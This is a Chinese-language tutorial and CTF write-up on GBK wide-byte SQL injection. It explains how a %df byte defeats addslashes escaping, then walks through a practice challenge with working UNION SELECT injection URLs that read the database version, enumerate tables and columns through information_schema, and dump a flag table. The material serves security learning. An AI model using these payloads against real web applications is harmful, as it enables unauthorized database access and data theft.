宽字节注入

宽字节注入

0X01 原理

宽字节注入是利用mysql的一个特性，mysql在使用GBK编码的时候，会认为两个字符是一个汉字（前一个ASCII码要大于128，才到汉字的范围），示例如下图：

PHP中编码为GBK，函数执行添加的是ASCII编码（添加的符号为“\”），MYSQL默认字符集是GBK等宽字节字符集。如上图所示%df’被PHP转义，单引号被加上反斜杠\，变成了%d’，其中\的十六进制是%5C，那么现在%d’=%d%5C%27,如果程序的默认字符集是GBK等宽字节字符集，则MYSQL用GBK编码时，会认为%df%5C是一个宽字符，也就是縗，也就是说：%df\’ = %df%5c%27=縗’，有了单引号就可以注入了。

字符、字符集

字符(character)是组成字符集(character set)的基本单位。对字符赋予一个数值(encoding)来确定这个字符在该字符集中的位置。

UTF8

由于ASCII表示的字符只有128个，因此网络世界的规范是使用UNICODE编码，但是用ASCII表示的字符使用UNICODE并不高效。因此出现了中间格式字符集，被称为通用转换格式，及UTF(Universal Transformation Format)。

宽字节

GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节，实际上只有两字节。宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象，即将两个ascii字符误认为是一个宽字节字符。

0X02 相关小记

URL转码

’ ——> %27

空格 ——> %20

#符号 ——> %23

\ ——> %5C

addslashes函数：

如何从addslashes函数逃逸出来？

1.\前面再加一个\（或单数个），变成\ \ ',这样\被转义了，'逃出了限制

2.把\弄没

0X03 例题解析

题目地址http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

1.先测试是否可以注入

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=1 -- -

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 -- -

可以看出，可以注入。

2.继续注入

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -

sae-chinalover十六进制是0x7361652d6368696e616c6f766572，用十六进制来绕过字符转义

3.在文件里找到flag即可

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(id,content) from ctf2-- -

思路是对的，也找出来flag了，但是真正的flag是nctf{gbk_3sqli}，可能出了点小问题。但是考点和思路都是宽字节注入，仅供参考。